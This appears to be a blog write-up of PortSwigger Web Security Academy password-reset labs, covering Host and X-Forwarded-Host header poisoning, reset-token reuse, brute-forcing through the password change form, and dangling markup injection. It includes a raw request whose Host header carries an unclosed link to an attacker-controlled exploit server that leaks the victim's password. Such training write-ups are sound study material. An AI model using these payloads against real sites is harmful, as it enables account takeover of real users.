Home Vulnerable Password Reset

Vulnerable Password Reset


This post/writeup is all about the Authentication vulnerabilities or Broken Authentication if we follow OWASP naming scheme.

I’ll be using primarily Portswigger Web Academy Labs, but i do intent do throw other labs and writeups here as well.

This post is all about vulnerable password reset implementations which can bypass authentication completely or allow the attacker to bypass other security implementations


Basic password reset poisoning - (Host Header)

This lab is vulnerable to password reset poisoning. The user carlos will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos’s account.

You can log in to your own account using the following credentials: wiener:peter. Any emails sent to this account can be read via the email client on the exploit server.

Enumeration - Password Reset

Password Reset functionality on the front-end is just like any other:

picture 129

In the request we can notice CSRF token and that we can request it for any user basically, but that is by itself not an issue, as email should be sent to users account.

picture 128

Exploitation - Password Account

If we however change the Host HTTP Header to our own Exploit Server: exploit-0ab000a60403a23bc0663c42014a00e6.web-security-academy.net/exploit, then Email would still be sent:

picture 130

And if we check the logs, we can find the request with the token code right there in the middle:

picture 131

If i now open the link https://0a110040049ca2b2c06b3c6d0058002b.web-security-academy.net/forgot-password?temp-forgot-password-token=bsWHQe5G70EQyDdmK29IbyvrK4SxZ1Cm i can set password for carlos.

picture 132

Lab has been solved:

picture 133

Password reset broken logic

This lab’s password reset functionality is vulnerable. To solve the lab, reset Carlos’s password then log in and access his “My account” page.

Your credentials: wiener:peter

Victim’s username: carlos

Enumerating Password Reset mechanismus

First of all let’s just reset password for wiener. For this we need an email address which is provided by the Lab

picture 103

In password-reset we can either enter username or email. Let’s go for an username:

picture 104

Email comes with a reset link:


If i ask for another password-reset token, it changes


If we click on it, we get to the page to enter a new password.

If we enter a new password, this is a request that is issued to a backend

picture 105

The question now arises, can we swap the username with carlos using token that was issued for wiener?

Exploiting Password Reset Mechanismus

If we simply reuse the previous token that was sent to wiener and swap the user with carlos, it appears that it’s actually working

picture 106

We can login now with carlos:peter

picture 107

Token should only be used once and by any means, it should not work for other users that have not requested it.

Password reset poisoning via middleware - (X-Forwarded-For Header)

This lab is vulnerable to password reset poisoning. The user carlos will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos’s account. You can log in to your own account using the following credentials: wiener:peter. Any emails sent to this account can be read via the email client on the exploit server.

Finding and exploiting the vulnerability

If we ask for password we get same looking link as in previous lab:


And request does not ask us for a username

picture 108

Problem here is actually in middleware and this lab is all about that. If we enter X-Forwarded-Host header, the link sent will actually get tampered with and swapped with our own host. Let’s verify that:

picture 109

And checking the access log on our exploit server, we can see that request is there:

picture 110

We can change the password if we follow the link

picture 112

… and login using same password:

picture 113

More on that topic can be found at Portswigger Reset Password. It all comes down, how the web application crates the token and what its security measures are. As always, it’s always dangerous to use user generated input.

Password brute-force via password change

This lab’s password change functionality makes it vulnerable to brute-force attacks. To solve the lab, use the list of candidate passwords to brute-force Carlos’s account and access his “My account” page.

Your credentials: wiener:peter

Victim’s username: carlos

Candidate passwords

Brute-Force via password change exploitation

If we login, we have this form to update password:

picture 114

… and this is how request looks like in Burp:

picture 115

If we enter wrong password 2 times, account locks for 1 minute!

If we enter wrong password AND two different new passwords, we get another error message: Current password is incorrect!

picture 117

Now let’s brute-force using intruder!

picture 118

So get another response that new passwords do not match, meaning we’ve found the current password = jordan.

Lab has been solved.

picture 119

Password reset poisoning via dangling markup

This lab is vulnerable to password reset poisoning via dangling markup. To solve the lab, log in to Carlos’s account.

You can log in to your own account using the following credentials: wiener:peter. Any emails sent to this account can be read via the email client on the exploit server.

Reference: Dangling markup injection


When we reset a password for our wiener user, we’d get an Email looking like this

picture 134

This is the raw Email found at /email, and there appears to be no sanitization.

Sent:     2022-10-04 10:54:27 +0000
From:     no-reply@0ac100e703e228b2c0f54f3d00170041.web-security-academy.net
To:       wiener@exploit-0a610053038828f2c0684ff0010e0010.web-security-academy.net
Subject:  Account recovery

<p>Hello!</p><p>Please <a href='https://0ac100e703e228b2c0f54f3d00170041.web-security-academy.net/login'>click here</a> to login with your new password: bUzAvNKZqV</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>

Another thing to note here is that we recieve a new password per email and not just Change password link!

The email above will also be our injection point for partially XSS. Idea of this Dangling attack is to poison HTML, like with XSS, by using tag like (img, a,…) pointing it to our controlled server and leaving the tag open (not closing Tags).

If we send Host with a header like this:

POST /forgot-password HTTP/1.1
Host: 0a4c00770427c3cdc0b732ee006d00b7.web-security-academy.net:'<a href="exploit-0a100050044cc386c015325d01860069.web-security-academy.net/?


If we do that and we know that carlos accesses the same Email client then we should now find the request in the access logs.

picture 136

So there we have two requests from different IP. One is for wiener and other one is for carlos.

picture 135

After ending this Lab, i wasn’t sure when this really would be exploitable. I’d say somewhere between finding XSS and not being able to leverage it, Dangling using HTTP Headers might be something to consider!

This post is licensed under CC BY 4.0 by the author.